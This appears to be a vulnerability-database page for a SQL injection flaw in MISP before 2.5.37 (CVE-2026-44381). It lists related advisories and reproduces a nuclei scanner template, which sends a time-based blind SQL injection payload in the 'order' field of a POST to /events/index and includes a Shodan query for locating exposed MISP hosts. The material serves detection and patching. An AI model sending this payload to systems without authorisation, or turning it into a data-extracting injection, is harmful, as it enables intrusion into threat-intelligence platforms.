Lucene search
+L

MISP < 2.5.37 - SQL Injection

🗓️ 26 Jul 2026 03:00:24Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

MISP before 2.5.37 is vulnerable to SQL injection via the order parameter in EventsController; upgrade to 2.5.37.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-44381
13 May 202620:50
attackerkb
Circl
CVE-2026-44381
14 May 202600:33
circl
CNNVD
MISP SQL注入漏洞
13 May 202600:00
cnnvd
CVE
CVE-2026-44381
13 May 202620:50
cve
Cvelist
CVE-2026-44381 MISP: SQL injection via unvalidated ordering parameters in event and shadow attribute listings
13 May 202620:50
cvelist
EUVD
EUVD-2026-30168
13 May 202620:50
euvd
NVD
CVE-2026-44381
13 May 202621:16
nvd
OSV
CVE-2026-44381 MISP: SQL injection via unvalidated ordering parameters in event and shadow attribute listings
13 May 202620:50
osv
Positive Technologies
PT-2026-40809
13 May 202600:00
ptsecurity
RedhatCVE
CVE-2026-44381
5 Jun 202619:11
redhatcve
Rows per page
id: CVE-2026-44381

info:
  name: MISP < 2.5.37 - SQL Injection
  author: malcha
  severity: medium
  description: |
    MISP before 2.5.37 is vulnerable to SQL injection via the order parameter in EventsController. The POST body order value is passed directly into ORDER BY clauses without validation.
  remediation: |
    Upgrade MISP to version 2.5.37 or later.
  reference:
    - https://github.com/MISP/MISP/security/advisories/GHSA-4cxp-22wm-j6jr
    - https://github.com/MISP/MISP/commit/53fc6be7da1c010ca4696a37c6e27bb699377efa
    - https://nvd.nist.gov/vuln/detail/CVE-2026-44381
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-44381
    epss-score: 0.00666
    epss-percentile: 0.48059
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"MISP"
  tags: cve,cve2026,misp,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/login HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "MISP"
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /events/index HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_key}}
        Content-Type: application/json

        {"order":"(SELECT 1 FROM (SELECT(SLEEP(8)))A)"}

    matchers:
      - type: dsl
        dsl:
          - "duration >= 8"
          - "status_code == 200 || status_code == 500"
        condition: and
# digest: 4b0a00483046022100dcee5f24a06f557d919c5895c012f49a2d2187c2d2d9735c50dcd80404903f40022100ccb81353fbe75274322a8002d57bb5b9aecf353d017700247dd0196b3afa623a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 May 2026 20:40Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
CVSS 49.3
EPSS0.00666
SSVC
10